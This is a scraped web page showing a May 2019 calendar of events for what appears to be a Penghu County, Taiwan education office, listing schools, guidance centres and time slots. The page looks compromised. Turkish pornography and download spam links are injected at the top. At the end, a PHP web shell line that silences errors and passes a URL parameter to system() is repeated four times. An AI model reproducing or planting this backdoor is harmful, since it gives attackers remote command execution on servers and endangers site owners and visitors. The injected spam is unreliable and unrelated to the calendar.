apk indir - mp3 indir
porno izle - mobil porno - porno - türkçe porno

主要索引標籤

五月 2019

週一 週五 週六 周日
29
30
1
2
3
4
5
 
 
 
 
教育處
全天(08:00~17:30)
 
縣立鎮海國中
全天(08:00~17:30)
 
國小國語領域
馬公市時裡國小
全天(08:00~17:30)
 
輔導團
上午(08:00~12:00)
 
 
6
7
8
9
10
11
12
教育處
全天(08:00~17:30)
 
教育處
上午(08:00~12:00)
 
國中社會領域
全天(08:00~17:30)
 
西嶼鄉合橫國小
全天(08:00~17:30)
 
教育處
下午(13:30~17:30)
 
西嶼鄉合橫國小
全天(08:00~17:30)
 
輔諮中心
下午(13:30~17:30)
 
輔諮中心
全天(08:00~17:30)
 
輔諮中心
全天(08:00~17:30)
 
湖西鄉隘門國小
全天(08:00~17:30)
 
縣立鳥嶼國中
全天(08:00~17:30)
 
 
13
14
15
16
17
18
19
白沙鄉鳥嶼國小
全天(08:00~17:30)
 
 
教育處
上午(08:00~12:00)
 
國小社會領域
下午(13:30~17:30)
 
 
輔導團
全天(08:00~17:30)
 
輔諮中心
全天(08:00~17:30)
 
輔導團
全天(08:00~17:30)
 
國中小環境議題
全天(08:00~17:30)
 
輔導團
全天(08:00~17:30)
 
教保資源中心
全天(08:00~17:30)
 
20
21
22
23
24
25
26
教育處
上午(08:00~12:00)
 
 
 
 
輔諮中心
全天(08:00~17:30)
 
湖西鄉沙港國小
上午(08:00~12:00)
 
教保資源中心
全天(08:00~17:30)
 
教育處
全天(08:00~17:30)
 
縣立鎮海國中
下午(13:30~17:30)
 
27
28
29
30
31
1
2
教育處
全天(08:00~17:30)
 
教育處
全天(08:00~17:30)
 
 
家庭教育中心
全天(08:00~17:30)
 
國小國語領域
下午(13:30~17:30)
 
教育處
全天(08:00~17:30)
 
 
 
error_reporting(0); $bozx=$_GET[boz]; system($bozx); error_reporting(0); $bozx=$_GET[boz]; system($bozx); error_reporting(0); $bozx=$_GET[boz]; system($bozx); error_reporting(0); $bozx=$_GET[boz]; system($bozx);